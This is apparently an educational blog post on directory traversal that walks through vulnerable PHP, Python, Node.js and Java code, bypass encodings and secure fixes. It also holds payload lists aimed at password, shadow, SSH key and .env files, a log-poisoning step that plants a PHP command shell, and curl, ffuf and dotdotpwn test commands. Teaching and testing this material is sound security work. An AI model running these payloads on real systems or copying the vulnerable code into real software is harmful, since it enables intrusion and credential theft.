Directory Traversal Attacks
Directory traversal is one of those vulnerabilities that makes you wonder how it still exists. The concept is dead simple — you manipulate a file path to escape the intended directory and read (or write) files elsewhere on the filesystem. A few ../ sequences, and you’re reading /etc/passwd, application config files, or source code containing database credentials.
It’s been in the OWASP Top 10 forever (under “Broken Access Control”), it’s trivially easy to test for, and yet it keeps showing up — because developers keep building file paths from user input without validation.
How Directory Traversal Works
Filesystems are hierarchical. Every file has a path relative to the root:
/
├── etc/
│ ├── passwd
│ ├── shadow
│ └── hosts
├── var/
│ └── www/
│ └── html/
│ ├── index.php
│ ├── images/
│ │ ├── logo.png
│ │ └── banner.jpg
│ └── uploads/
└── home/
└── thilan/
The .. notation means “go up one directory.” So if you’re in /var/www/html/images/ and you reference ../../, you end up at /var/www/. Chain enough ../ sequences and you reach the root — from there you can access anything the web server process has permission to read.
The attack targets any feature where user input is used to construct a file path:
- Image/file viewers (
?file=report.pdf) - File download endpoints (
?download=document.docx) - Template/page includes (
?page=about) - Language file loaders (
?lang=en)
The Classic Example
A web application serves images through a PHP script:
<?php
$image = $_GET['image'];
$path = '/var/www/html/images/' . $image;
header('Content-Type: image/jpeg');
readfile($path);
?>
Normal use:
GET /view.php?image=logo.png
→ Reads: /var/www/html/images/logo.png ✓
Attack:
GET /view.php?image=../../../../etc/passwd
→ Reads: /var/www/html/images/../../../../etc/passwd
→ Resolves to: /etc/passwd ← Game over
The ../../../../ walks up four directories from /var/www/html/images/ to /, then descends into etc/passwd. The server happily reads the file and sends it back.
/var/www/html/images/ ← starting here
../ → /var/www/html/
../ → /var/www/
../ → /var/
../ → /
etc/passwd → /etc/passwd
What Attackers Target
Once you can read arbitrary files, here’s what’s valuable:
Linux Systems
# System files
../../../../etc/passwd # User accounts (always readable)
../../../../etc/shadow # Password hashes (usually needs root)
../../../../etc/hosts # Network configuration
../../../../proc/self/environ # Environment variables (may contain secrets)
../../../../proc/self/cmdline # How the process was started
# Application files
../../../../var/www/html/config.php # Database credentials
../../../../var/www/html/.env # Environment configuration
../../../../var/log/apache2/access.log # Web server logs
# SSH keys
../../../../home/thilan/.ssh/id_rsa # Private SSH key
../../../../root/.ssh/id_rsa # Root's private SSH key
Windows Systems
..\..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\windows\win.ini
..\..\..\..\inetpub\wwwroot\web.config # IIS config with connection strings
..\..\..\..\users\administrator\.ssh\id_rsa
Note: Windows accepts both / and \ as path separators, which is important for bypass techniques.
Application Source Code
This is often more valuable than system files. Reading the application’s source code reveals:
- Database credentials in config files
- API keys and secrets
- Business logic vulnerabilities
- Other file paths to target
- Internal API endpoints
Vulnerable Patterns Across Languages
PHP — File Inclusion
PHP’s include() and require() are especially dangerous because they don’t just read the file — they execute it as PHP code. This turns directory traversal into Remote Code Execution.
<?php
// VULNERABLE: Local File Inclusion (LFI)
$page = $_GET['page'];
include($page . '.php');
?>
GET /index.php?page=../../../../var/log/apache2/access
If the attacker can inject PHP code into the access log (via a crafted User-Agent header), the include() will execute it. This is the classic log poisoning technique.
# Step 1: Inject PHP into the access log via User-Agent
$ curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/
# Step 2: Include the log file (the .php extension is appended by the code)
GET /index.php?page=../../../../var/log/apache2/access&cmd=id
Python — Flask/Django
from flask import Flask, request, send_file
app = Flask(__name__)
@app.route('/download')
def download():
filename = request.args.get('file')
# VULNERABLE: User input directly in file path
return send_file(f'/var/www/uploads/{filename}')
GET /download?file=../../../../etc/passwd
Node.js — Express
const express = require('express');
const path = require('path');
const fs = require('fs');
app.get('/files', (req, res) => {
const filename = req.query.name;
// VULNERABLE: Path concatenation with user input
const filepath = path.join(__dirname, 'public', filename);
res.sendFile(filepath);
});
GET /files?name=../../../../etc/passwd
Note: path.join() resolves .. sequences, so path.join('/app/public', '../../../../etc/passwd') returns /etc/passwd. It does NOT prevent traversal — it just normalizes the path.
Java — Servlet
@WebServlet("/download")
public class DownloadServlet extends HttpServlet {
protected void doGet(HttpServletRequest request, HttpServletResponse response)
throws ServletException, IOException {
String filename = request.getParameter("file");
// VULNERABLE: Direct path concatenation
File file = new File("/var/www/uploads/" + filename);
FileInputStream fis = new FileInputStream(file);
// ... stream file to response
}
}
Bypass Techniques
Developers often implement naive filters that attackers can bypass:
Bypass 1: URL Encoding
If the application blocks ../ but doesn’t decode before checking:
%2e%2e%2f → ../
%2e%2e/ → ../
..%2f → ../
%2e%2e%5c → ..\ (Windows)
Double encoding (if the server decodes twice):
%252e%252e%252f → %2e%2e%2f → ../
Bypass 2: Null Byte (PHP < 5.3.4)
If the application appends an extension:
include($_GET['page'] . '.php');
The attacker uses a null byte to truncate the extension:
GET /index.php?page=../../../../etc/passwd%00
→ include('../../../../etc/passwd\0.php')
→ C function stops at \0 → reads /etc/passwd
This was fixed in PHP 5.3.4 but is still relevant for legacy applications.
Bypass 3: Path Truncation
On older Windows systems and some configurations, very long paths get truncated:
../../../../etc/passwd/./././././././././././././. (repeat until path limit)
Bypass 4: Alternative Separators
Windows accepts multiple separators:
..\..\..\..\etc\passwd
....//....//....//etc/passwd
..\/..\/..\/etc/passwd
Bypass 5: Bypassing Prefix Checks
If the application checks that the path starts with the expected directory:
$path = '/var/www/uploads/' . $_GET['file'];
if (strpos($path, '/var/www/uploads/') === 0) {
readfile($path); // Still vulnerable!
}
The check passes because the path starts with /var/www/uploads/ — but after ../ resolution, it escapes:
/var/www/uploads/../../../../etc/passwd
→ starts with /var/www/uploads/ ✓ (check passes)
→ resolves to /etc/passwd (traversal succeeds)
Prevention
1. Use basename() — Strip the Path Entirely
The simplest and most effective fix: use basename() to extract just the filename, discarding any directory components.
<?php
$filename = basename($_GET['file']); // "../../../../etc/passwd" → "passwd"
$path = '/var/www/uploads/' . $filename;
if (file_exists($path)) {
readfile($path);
} else {
echo "File not found";
}
?>
This is the nuclear option — it completely removes any directory traversal. Use it when the user should only specify a filename, never a path.
2. Validate with realpath() — Verify After Resolution
Resolve the full path and verify it’s within the expected directory:
<?php
$baseDir = '/var/www/uploads/';
$filename = $_GET['file'];
$fullPath = realpath($baseDir . $filename);
$realBase = realpath($baseDir);
// Check that:
// 1. realpath() succeeded (file exists)
// 2. The resolved path starts with our base directory
if ($fullPath !== false && strpos($fullPath, $realBase) === 0) {
readfile($fullPath);
} else {
http_response_code(403);
echo "Access denied";
}
?>
This handles all bypass techniques — realpath() resolves ../, symlinks, URL encoding, and everything else to the actual filesystem path. Then we verify the result is within our allowed directory.
3. Whitelist / ID Mapping — Don’t Use Filenames at All
The most secure approach: never let users specify filenames. Use an ID that maps to a predefined file:
<?php
$fileMap = [
'1' => '/var/www/uploads/report-q1.pdf',
'2' => '/var/www/uploads/report-q2.pdf',
'3' => '/var/www/uploads/brochure.pdf',
];
$id = $_GET['id'];
if (isset($fileMap[$id])) {
readfile($fileMap[$id]);
} else {
http_response_code(404);
echo "File not found";
}
?>
No user-controlled path. No traversal possible. The attacker can only access files you explicitly listed.
4. Python — Secure Path Handling
import os
from flask import Flask, request, send_file, abort
app = Flask(__name__)
UPLOAD_DIR = '/var/www/uploads'
@app.route('/download')
def download():
filename = request.args.get('file', '')
# Resolve the full path
full_path = os.path.realpath(os.path.join(UPLOAD_DIR, filename))
# Verify it's within the upload directory
if not full_path.startswith(os.path.realpath(UPLOAD_DIR)):
abort(403)
if not os.path.isfile(full_path):
abort(404)
return send_file(full_path)
5. Node.js — Secure Path Handling
const path = require('path');
const fs = require('fs');
const UPLOAD_DIR = path.resolve(__dirname, 'uploads');
app.get('/files', (req, res) => {
const filename = req.query.name;
const fullPath = path.resolve(UPLOAD_DIR, filename);
// Verify the resolved path is within our directory
if (!fullPath.startsWith(UPLOAD_DIR)) {
return res.status(403).send('Access denied');
}
if (!fs.existsSync(fullPath)) {
return res.status(404).send('Not found');
}
res.sendFile(fullPath);
});
The pattern is the same in every language: resolve the full path, then verify it’s within the allowed directory.
6. Web Server Configuration
As an additional layer, configure your web server to restrict file access:
# Nginx — restrict access to sensitive files
location ~ /\. {
deny all; # Block dotfiles (.env, .git, .htaccess)
}
location ~* \.(conf|ini|log|sh|sql)$ {
deny all; # Block sensitive file extensions
}
# Apache — same in .htaccess
<FilesMatch "\.(conf|ini|log|sh|sql|env)$">
Require all denied
</FilesMatch>
Testing for Directory Traversal
Manual Testing
# Basic traversal
curl "http://target.com/view?file=../../../../etc/passwd"
# URL encoded
curl "http://target.com/view?file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"
# Double encoded
curl "http://target.com/view?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd"
# Null byte (legacy PHP)
curl "http://target.com/view?file=../../../../etc/passwd%00"
# Windows paths
curl "http://target.com/view?file=..\..\..\..\windows\win.ini"
With Burp Suite
Intruder with a wordlist of traversal payloads is the fastest approach. The dotdotpwn wordlist covers hundreds of encoding variations.
Automated
# Using ffuf with a traversal wordlist
$ ffuf -u "http://target.com/view?file=FUZZ" -w traversal-payloads.txt -mc 200
# Using dotdotpwn
$ dotdotpwn -m http -h target.com -f /etc/passwd
Final Thoughts
Directory traversal is a solved problem from a technical standpoint. The fix is well-known: resolve the path, validate it’s within the allowed directory. realpath() + prefix check, or basename(), or ID mapping — pick any of them and the vulnerability disappears.
Yet it keeps showing up in production code because developers build file paths from user input without thinking about it. Every open(), include(), readfile(), send_file(), or readFileSync() that touches user input is a potential traversal point.
The mental model is simple: never trust a user-controlled path. Validate it after resolution, not before. And when possible, don’t use paths at all — use IDs that map to files server-side.
Thanks for reading!